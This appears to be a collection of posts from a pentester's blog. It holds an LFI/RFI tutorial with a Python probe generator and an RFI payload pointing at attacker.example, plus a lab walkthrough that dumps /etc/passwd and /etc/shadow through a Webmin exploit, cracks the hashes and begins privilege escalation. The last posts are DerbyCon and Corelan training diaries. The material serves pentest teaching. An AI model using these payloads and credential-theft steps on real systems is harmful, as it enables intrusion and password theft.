Windows/Linux LFI/RFI + MSF + Fimap = call me tons of fun

Hey guys, as promised I wanted to do something a little different. I made a sample video of Fimap, which is a tool to find and exploit Local and Remote File Inclusion bugs. If you aren’t familiar with the tool you can check it out here.

File inclusion (FI) happens when a web application takes user-supplied input and hands it to a function that loads a file, so the attacker gets to choose which local file (Local File Inclusion) or which URL (Remote File Inclusion) gets pulled in. You can learn more about LFI/RFI here. Most people confuse LFI/RFI with directory (path) traversal; both are bad, but traversal only reads a file, while an included file is executed as PHP, so LFI/RFI can usually be turned into code execution, which is what makes it fun times for a pentester.

When looking for FI bugs, I check whether the PHP code passes user input into the commonly abused functions (e.g. include, include_once, require, require_once, fopen, file_get_contents). In the example that I will be attacking, the page uses the “include” function. Keep in mind that fopen and file_get_contents only read the file, while include/require also execute it. Whether any of them will fetch a remote URL is controlled in the “php.ini” file: allow_url_fopen for the read functions and allow_url_include for include/require, so RFI only works when the relevant setting is On (allow_url_include is Off by default, which is why many targets are LFI-only). More info can be found here and here.

You will normally see code like this:

// Vulnerable: "page" is read straight from GET, POST or a cookie with no filtering
$incfile = $_REQUEST["page"];
// The attacker controls everything before ".php": "../" walks the filesystem, a %00
// truncates the suffix on PHP older than 5.3.4, and a URL turns it into RFI if allow_url_include is On
include($incfile.".php");

In this example, the vulnerable parameter is “page”: its value is used, unfiltered, as the path handed to include(), and the appended “.php” is the only thing standing between the attacker and an arbitrary file.
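To make the hunt concrete, here is an added example (my own code, not from the original post and not Fimap's): it generates the probes you would throw at a parameter used like include($_REQUEST["page"].".php") and classifies what comes back using the fingerprints a file-inclusion scanner looks for. The target URL, parameter name and attacker host are hypothetical, and the responses it scans are constructed samples so it runs offline.

```python
"""Added example, not code from the original post and not Fimap's own code.
It generates the probes you would throw at a parameter used like
include($_REQUEST["page"].".php") and classifies what comes back by the
fingerprints a file-inclusion scanner looks for. Everything runs offline on
constructed sample responses; the target URL, parameter name and attacker
host are hypothetical."""
import base64
import binascii
import re
from urllib.parse import quote

LINUX_TARGET = "etc/passwd"          # world-readable, instantly recognisable
WINDOWS_TARGET = "windows/win.ini"   # the Windows equivalent
RFI_URL = "http://attacker.example/shell.txt"   # hypothetical attacker host

# What a successful inclusion looks like in the response body. No ^ anchors:
# the included file usually lands in the middle of the page's HTML.
FINGERPRINTS = {
    "linux_passwd": re.compile(r"root:[^:\n]*:0:0:"),
    "windows_ini": re.compile(r"\[(fonts|extensions|mci extensions)\]", re.I),
    "php_source": re.compile(r"<\?php"),
    # PHP's warning leaks the path it tried: proof the value reaches include()
    "include_error": re.compile(r"failed to open stream", re.I),
}


def build_payloads(base_url, param, depth=6):
    """Return (label, url) pairs for one injection point.

    The code appends ".php", so each payload has to get rid of that suffix:
    a trailing NUL byte (PHP < 5.3.4 stops reading the path there), a
    php://filter wrapper that base64-encodes the file so the source is not
    executed, and for RFI a trailing "?" so ".php" becomes a query string
    the attacker's server ignores (needs allow_url_include=On).
    """
    up = "../" * depth
    raw = [
        ("lfi_linux_null", f"{up}{LINUX_TARGET}\x00"),
        ("lfi_linux_plain", f"{up}{LINUX_TARGET}"),
        ("lfi_windows_null", f"{up}{WINDOWS_TARGET}\x00"),
        ("lfi_source_filter", "php://filter/convert.base64-encode/resource=index"),
        ("rfi_query", f"{RFI_URL}?"),
    ]
    # quote() turns the NUL into %00 and leaves the traversal readable
    return [(label, f"{base_url}?{param}={quote(value, safe='/:')}")
            for label, value in raw]


def classify(body):
    """Name the fingerprint found in a response body, or None."""
    for label, rx in FINGERPRINTS.items():
        if rx.search(body):
            return label
    # php://filter output is one base64 blob: decode it and look again
    blob = re.sub(r"\s+", "", body)
    if blob and re.fullmatch(r"[A-Za-z0-9+/=]+", blob):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            return None
        if FINGERPRINTS["php_source"].search(decoded):
            return "php_source_b64"
    return None


def scan(responses):
    """Map each probe label to the fingerprint its response matched."""
    return {label: classify(body) for label, body in responses.items()}


# Constructed responses standing in for what the target would return.
SAMPLE_RESPONSES = {
    "lfi_linux_null": "<html><body>root:x:0:0:root:/root:/bin/bash\n"
                      "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n</body></html>",
    "lfi_windows_null": "; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n",
    "lfi_source_filter": base64.b64encode(
        b"<?php\n$incfile = $_REQUEST[\"page\"];\ninclude($incfile.\".php\");\n").decode(),
    "not_vulnerable": "<html><body>Page not found</body></html>",
}

if __name__ == "__main__":
    for label, url in build_payloads("http://target.example/index.php", "page"):
        print(label, url)
    print(scan(SAMPLE_RESPONSES))
```

The php://filter probe is the one to try first on a modern target: it works regardless of the appended “.php”, needs no NUL byte, and hands you the source of the vulnerable page itself, which tells you exactly which function is in play before you spend time on traversal depths.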

Scenario: We are attacking two machines (Linux and Windows). I wanted to show the versatility of the tool and how easy it is to go from identifying the bug to Admin/Root.

Video: http://www.youtube.com/watch?v=AIigCni-bJI

Sorry for the delay, I guess things went crazy. Ahwell!!! Hope you enjoy!

Now that I sort of worked out the video issue, I am going to do a mini-series on Exploit Dev. This series will cover setting up the lab environment, writing our exploits in Python and Ruby (Metasploit modules), and semi-advanced software protection bypass.

Webmin + John = root!

I wanted to do something different this week, however the video I recorded crashed and didn't save correctly. sniffles I will attempt to do a video this weekend since I have some extra time and get it uploaded for next week. I still wanted to do something, so I was going through some of my old notes and decided to write about an oldie but goodie.

Scenario:
I was approached by a mean kitteh. He said that if we can hack into his box, we can have all the beers we want. However, he said that if we cannot hack into his box, he will eat our faces and piss on our favorite Batman Chucks!! 🙁 Since I love beer, I figured why not.

After scanning the kitteh’s network, I came across the following port open on a host:

Webmin on default port

I wanted to make sure I could reach the victim on that port by visiting the IP:PORT in our browser. Since my other scans were not completed yet, I went to the Googles!! If an earlier hydra or Nessus scan had turned up weak passwords, the game would pretty much be over already, depending on how Webmin was installed (by default it runs as root).

[screenshot]

As you can see from the screenshot, Webmin is running with root permissions, so a valid login would let us execute any command that we want. However, if you aren't that lucky, extra research comes in handy. I have identified that this version of Webmin has a flaw that allows us to retrieve arbitrary files from the local system, and since the service runs as root, that means any file on the box. This could come in handy! Of course, you can easily search the Internet and find many exploits or ways to hack this version of Webmin.

Now that we have done our research and have found a promising exploit, let's get to work!!!

[screenshot of the exploit]

Ok, from the exploit we see that the arguments are:

url - victim URL/IP
port - in most cases the default is "10000"
filename - the full path of the file you are looking to retrieve
target - whether the victim uses HTTP or HTTPS (0 for HTTP, 1 for HTTPS; the commands below use 0)

That seems simple enough. The easiest thing to do is to attempt to retrieve the “/etc/passwd” file: it is world-readable on every Unix box, so it comes back even if the disclosure bug runs with low privileges, which makes it a good first test.

[screenshot]

Awesome, looks like we can read the “/etc/passwd” file. Let's see if we can read any other files, like the “/etc/shadow” file. 😉 YAY! we can read that file as well. That one only root can read, so getting it back confirms that the Webmin process really is running as root. Let's save them to files in preparation for our next step with john.

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/passwd 0 > passwd.txt

root@L4mers3c:~# perl 2017.pl 192.168.160.156 10000 /etc/shadow 0 > shadow.txt

You may have to clean up the output a little: the exploit dumps whatever the server sent back, and unshadow expects nothing but bare “user:...” lines, so strip anything else out of both files first.

Now that we have both files saved, we can use a cool utility that comes along with John the Ripper (JTR) called “unshadow”. Unshadow takes an “/etc/passwd” file and merges it with an “/etc/shadow” file, putting each account's hash back into the password field so john gets the user info and the hash in one line. Whether we actually crack anything, of course, depends on how secure and complex the kitteh's passwords are.

root@L4mers3c:~# unshadow passwd.txt shadow.txt > both.txt
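Because the clean-up step trips people up, here is an added example (my own code, not from the original post and not John the Ripper's unshadow) that strips the junk out of the two captures and then merges them the way unshadow does, and also tells you which hash type john will be facing. The raw captures in it are constructed samples, including the hashes; only the file layout matches what the exploit writes.

```python
"""Added example, not code from the original post and not John the Ripper's
unshadow. It does the "clean up" step for the files the disclosure exploit
dumped and then merges passwd and shadow the way unshadow does, so the result
can go straight to john. The raw captures below are constructed samples."""
import re

# A real entry is "name:field:field...". Anything else in the capture (the
# HTTP headers the exploit echoed, HTML, blank lines) has to go, because
# unshadow/john treat every line as an account.
PASSWD_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*:[^:\n]*:\d+:\d+:")
SHADOW_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*:[^:\n]*:[^:\n]*:")


def clean(raw, pattern):
    """Keep only the lines that look like entries of that file."""
    return [line.rstrip("\r") for line in raw.splitlines() if pattern.match(line)]


def hash_type(hsh):
    """Rough john format from the crypt(3) prefix."""
    prefixes = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}
    for prefix, name in prefixes.items():
        if hsh.startswith(prefix):
            return name
    return "descrypt" if len(hsh) == 13 else "unknown"


def unshadow(passwd_lines, shadow_lines):
    """Put each shadow hash into the password field of its passwd entry.

    Unlike the real unshadow this drops accounts that have nothing to crack
    ('*', '!', '!!' or an empty field), so john's run stays focused.
    """
    hashes = {}
    for line in shadow_lines:
        name, hsh = line.split(":", 2)[:2]
        hashes[name] = hsh
    merged = []
    for line in passwd_lines:
        fields = line.split(":")
        hsh = hashes.get(fields[0], fields[1])
        if hsh in ("", "*") or hsh.startswith("!"):
            continue   # locked, or no password at all
        fields[1] = hsh
        merged.append(":".join(fields))
    return merged


def merge_captures(raw_passwd, raw_shadow):
    """Clean both dumps and return the unshadowed lines plus hash types."""
    merged = unshadow(clean(raw_passwd, PASSWD_LINE), clean(raw_shadow, SHADOW_LINE))
    return merged, {m.split(":")[0]: hash_type(m.split(":")[1]) for m in merged}


# Constructed stand-ins for passwd.txt / shadow.txt as written by the exploit.
RAW_PASSWD = """HTTP/1.0 200 Document follows
Content-type: text/html

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
l4mers3c:x:500:500::/home/l4mers3c:/bin/bash
"""
RAW_SHADOW = """HTTP/1.0 200 Document follows
Content-type: text/html

root:$1$sLTXbGJn$yWhsdxvnE2u6IVyrbHbKJ/:14500:0:99999:7:::
bin:*:14500:0:99999:7:::
mysql:!!:14500:0:99999:7:::
l4mers3c:$1$Yp8QaZ2x$QfR0bB3cD4eF5gH6iJ7kL.:14500:0:99999:7:::
"""

if __name__ == "__main__":
    lines, kinds = merge_captures(RAW_PASSWD, RAW_SHADOW)
    print("\n".join(lines))
    print(kinds)
```

Write the merged lines to both.txt and run `john --wordlist=<your wordlist> both.txt` followed by `john --show both.txt` to list what fell. On a CentOS 5 box like this one the hashes are md5crypt ($1$), which john chews through quickly; if you see $6$ instead, budget a lot more time per guess.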

Now that both files are merged, we can attempt to crack them with JTR.

[screenshot]

As you can see we have cracked some of the really weak passwords. hmmm! During scanning I noticed that SSH was running on this host. Let's see if we can log in with one of the accounts that we have found.

[screenshot]

Game Over!! Well not really, if we look at our user permissions, we aren't root! The kitteh said we cannot have a beer until we get root. We can go through the normal post exploitation steps and look for a local privilege escalation exploit, starting with the kernel version.

[l4mers3c@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux
[l4mers3c@localhost ~]$

After searching on the Interwebz, we find that our victim is potentially vulnerable to the “Linux sock_sendpage() NULL pointer dereference” exploit (CVE-2009-2692): 2.6.18-128.el5 is the RHEL/CentOS 5.3 kernel built in January 2009, well before the August 2009 fix. Let's move it over to our victim and see what we can do. Keep in mind the exploit is C and has to be compiled, so check for gcc on the box first; if it isn't there, build it on a matching CentOS 5 system and copy the binary over.

root@L4mers3c:~# service apache2 start
[ ok ] Starting web server: apache2.
root@L4mers3c:~# searchsploit sock
Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit

Derbycon + sleepiness = Good Times!!

I had a great time at DerbyCon, I am already looking forward to next year. I hope to be ready to submit a talk, as the stats are at 57% for new speakers, makes me want to get my butt in gear and find the inspiration to do some research.

This pretty much sums up my DerbyCon experience! Great time at the Friday Night party. Awesome time speaking with Int80 from DualCore. He is the coolest marthafocka on the planet!

Int80 from Dual Core

And of course, me not being able to keep my eyes open during lunch.

[photo]

There was some talk about it being over crowded. I didn’t really notice, honestly after the first two days of the Corelan class the rest of the con was mostly a blur. I am afraid of the mass panic that it might cause next year with ticket purchases. Of course as Derbycon grows each year, I probably will be glad that they are capping off the tickets. My wife pointed out that there were a lot more females this year, I guess I didn’t notice until a group of them went to lunch and then all of a sudden she was pointing out all of her new Con Buddies. My wife had a great time and she is not a techy, but she loved going to the SE talks and meeting new people. This con always had this great family feel, I received several hugs this past week, even from Re1ik himself. haha! My wife talked with Larry Pesce about ear gauging and other things. But this proves one thing, DerbyCon is a great con and if you have not been able to make it out to one, I really would suggest attempting to. There are no egos, everyone was definitely approachable and once the beer started to flow, that became even more so. I am hoping to do the triple crown next year, which consists of DerbyCon in Kentucky, HackerCon in WV, and SkyDogCon in TN. If I play my cards right, maybe I will get a chance to speak at all 3.

As always, IronGeek will have all the videos up soon, I can't wait to check out the talks that I missed. Anyway, as for the blog, in my crazy attempt to post at least once a week, I plan on doing some video blogs pretty soon. I always come back from a Con with tons of stuff I want to do.

I met some great people this year, I spoke quite a bit with the guys that run the Good Samaritan Project; If you can or want to help out contact these guys and see how you can do some good with your GoogleFu. Also, check out Hackers for Charity, they are trying to do some good in this world and I finally had a chance to sign up to help out locally.

Until next time….HACK ALL THE THINGS, DRINK ALL THE BOOZE!!!!

Hell Day 2 aka Corelan Win32 Exploit Dev Bootcamp Day 2

Wow, we didn’t get out until 2am and everyone looked exhausted or defeated. hah! No really, day 2 was really fast paced. We covered tons of stuff (e.g. tons of SEH and advanced mitigation bypass, writing Metasploit modules, browser and heap stuff) and as I stated in the post about day 1, you really need to have some idea of what you are doing. Diving deep into mona.py and the powerful features of WinDbg (providing that your machine doesn’t crap out or you can’t download your symbol files correctly, sighs). However, you don’t have to be a pro at this stuff; it helps but isn't necessary. Corelan was/is a great teacher, and the teaching assistants were great; it is rare to have a great teacher and a course where the aides know quite a bit about the topics. He even went further to mention his site and forums, as well as the special forums we get as students of the course; if access to the special forums is the only thing you get from this class then that is enough. Lincoln and _sinner were great aides and helped me out a bit during the course with little tidbits. It was also nice to know that some of my ExDev “habits” were shared with them. haha!

Take away from the entire training:
I have made a commitment to myself to work on 1 exploit a week. These will be taking various things from MSF and Exploit-DB and converting them to Python and hopefully MSF. I will hopefully make a blog or two about my experiences and progress. Also, during this time I will be focusing back on OSCE and hopefully by November or December I will sit for the test. Corelan really stressed the fact that he worked on 2 exploits a week to keep at this stuff, because it is not his day job. Which really shocked me, but gave me motivation. It is amazing how much I have learned in this course and even though it was a rough course I would take it again. In fact I may, depending on my schedule and financial responsibilities, in a year or so, just to see where I am. This course will definitely teach you how to think and basic troubleshooting of your code. He also provided a few scripts to help with different things (outside of what mona can do). muahahah! I think the biggest thing I got from this course is not giving up! I got really frustrated when things weren't landing right in my exploits, but taking a step back and looking at my mistakes really taught me to just be patient; it is probably something simple that I am missing.

If you have a chance to take the course, you won't regret it. Oh, stop using NOPs in your exploit. haha! Prepare for pain and long nights. Have a beer or a few shots to calm your nerves and don’t give up.

Back to DerbyCon!!!

DerbyCon + Corelan Win32 Exploit Dev Bootcamp Day 1 = OMG!

I am having such a killer time at DerbyCon. It has only been a day and I have already met new people and am seeing a lot of familiar faces from last year. I love small cons, mainly this one, because no one seems to have an ego here and everyone is just chill. I highly recommend coming out to DerbyCon if you have a chance. Also, remember to try the Bourbon Beer from the Sway lounge, it's my fav.

Anyway, the real reason for this post. The Corelan bootcamp is everything I thought it would be. We went from 0-60 in no time. We started at 8:30am and didn’t finish until midnight, mostly because everyone in class was dead tired and couldn’t finish the last module of day 1. The first exploit lab has a lot of gotchas that will challenge the way you think; no, it's not your typical FTP server exploit. He really stressed all the bad habits we n00bs learn from just doing random tutorials around the interwebs. It's crazy how many times I have done exploits using NOPs, and the first thing he says in class is “NOPs are for lazy a*holes” and then starts to explain to us why we shouldn’t use them. There is a place and a time where you can use them, but the majority of the time you shouldn’t. Troubleshooting your programs is a more efficient way of learning and challenging yourself. I have noticed that the more I move into Exploit Dev there are a 1000 ways to skin a cat and now I am trying to soak in all the information. I would say that if you have followed his tutorials then you should have a good understanding of how basic stack-based overflows work. However, I would go over the material a few times, and actually attempt to do the higher level stuff (e.g. Heap, SEH, DEP, and ASLR). I would not be scared to take the class; even though it is a difficult class, Corelan does a really good job of explaining the material and making sure you understand the fundamentals. Sometimes, we as n00bs, just follow directions and really have no idea why we are doing certain things. Corelan spent a good chunk of day 1 covering the basics before we jumped into labs.

If you are thinking about taking the OSCE or the AWE, I would definitely figure out a way to take Corelan’s course first. I already feel a lot more comfortable doing Exploit Dev and working in a debugger. Of course even to sign up for the OSCE I would suggest that you know your way around the debugger, but it's nice to know that all my practice is really helping. Again, I would not be scared to take this course if you are just starting out. I think going through the many tutorials on the Net and his tutorials will really give you a great start. However, I would say know Python or at least be familiar with it. My plans are to work through this course material and then jump back into OSCE mode.

Anyway, I am going to grab breakfast and get ready for Day 2 aka “Hell Day 2”.